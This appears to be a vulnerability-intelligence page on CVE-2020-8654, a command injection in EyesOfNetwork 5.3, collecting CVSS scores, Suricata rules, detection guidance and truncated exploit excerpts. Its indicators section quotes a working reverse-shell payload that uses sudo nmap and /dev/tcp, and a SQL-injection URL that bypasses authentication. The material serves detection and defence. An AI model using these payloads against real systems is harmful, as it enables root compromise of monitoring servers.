CVE-2020-8654
published 2020-02-07CVE-2020-8654: An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS…
PriorityP276high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
85.65%
99.7th percentile
An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS commands via the /module/module_frame/index.php autodiscovery.php target field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eyesofnetwork | eyesofnetwork | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/lilac/autodiscovery.php
command;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #↗
url/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet↗
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)- →Exploit POST requests to /lilac/autodiscovery.php contain the body parameters: request=autodiscover, job_name=, nmap_binary, target[], and os.execute( — all present simultaneously indicate active exploitation.
- →The injection payload is placed in the target[] POST parameter and begins with a semicolon to break out of the nmap command context, e.g. ';id #' or ';echo ... > /tmp/h4k;sudo /usr/bin/nmap ...'. ↗
- →The exploit writes a malicious Nmap NSE script to /tmp/h4k and then invokes 'sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k' for privilege escalation. Monitor for nmap spawned by apache user with --script pointing to /tmp/. ↗
- →Authentication bypass via SQL injection uses the /eonapi/getApiKey endpoint with a UNION SELECT payload in the username parameter. Monitor for 'union select' strings in GET requests to /eonapi/getApiKey. ↗
- →The exploit tool uses a distinctive non-standard User-Agent string for all HTTP requests; presence of this UA in web logs targeting EON endpoints is a strong indicator of exploit tool usage. ↗
- →Successful exploitation results in a new admin user being created via POST to /eonapi/createEonUser. Monitor for unexpected admin user creation events in EON API logs. ↗
- →Version fingerprinting probe: attackers GET /css/eonweb.css and extract the '# VERSION :' string via regex to confirm a vulnerable EON version (5.1–5.3) before exploiting.
- ·HTTPS (SSL on port 443) is required for the Metasploit module to function; the exploit will not work over plain HTTP. ↗
- ·The exploit requires valid credentials for a user with administrative privileges, but can bypass authentication via a hardcoded API key (CVE-2020-8657) or SQL injection (CVE-2020-8656). ↗
- ·The Nuclei detection template only performs a passive version check via /css/eonweb.css and does not actively trigger the vulnerability; it matches EON versions equal to 5.1 through 5.3.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
suricata·2021-11-01·CVSS 8.8
CVE-2020-8654 [HIGH] ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signa
Exploit-DB
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
exploitdb·2020-03-05
CVE-2020-8657 EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'EyesOfNetwork AutoDiscovery Target Command Execution',
'Description' => %q{
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
and prior in order to execute arbitrary commands as root.
This module takes advantage of a command injection vulnerability in the
`target` parameter of the AutoDiscovery functionality within the EON web
interface in order to write an Nmap NSE script containing the payload to
disk. It then starts an Nmap scan to activate the payload. This results in
privilege escalation because the`apache` user can execute Nm
Exploit-DB
EyesOfNetwork 5.3 - Remote Code Execution
exploitdb·2020-02-07·CVSS 8.8
CVE-2020-8656 [HIGH] EyesOfNetwork 5.3 - Remote Code Execution
EyesOfNetwork 5.3 - Remote Code Execution
---
# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have
Nuclei
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
nuclei·CVSS 8.8
CVE-2020-8654 [HIGH] EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
Template:
id: CVE-2020-8654
info:
name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
author: praetorian-thendrickson
severity: high
description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context
Metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root. This module takes advantage of a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface in order to write an Nmap NSE script containing the payload to disk. It then starts an Nmap scan to activate the payload. This results in privilege escalation because the`apache` user can execute Nmap as root. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via various methods, depending on the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL injectio
No writeups or analysis indexed.
http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.htmlhttps://github.com/EyesOfNetworkCommunity/eonweb/issues/50http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.htmlhttps://github.com/EyesOfNetworkCommunity/eonweb/issues/50
2020-02-07
Published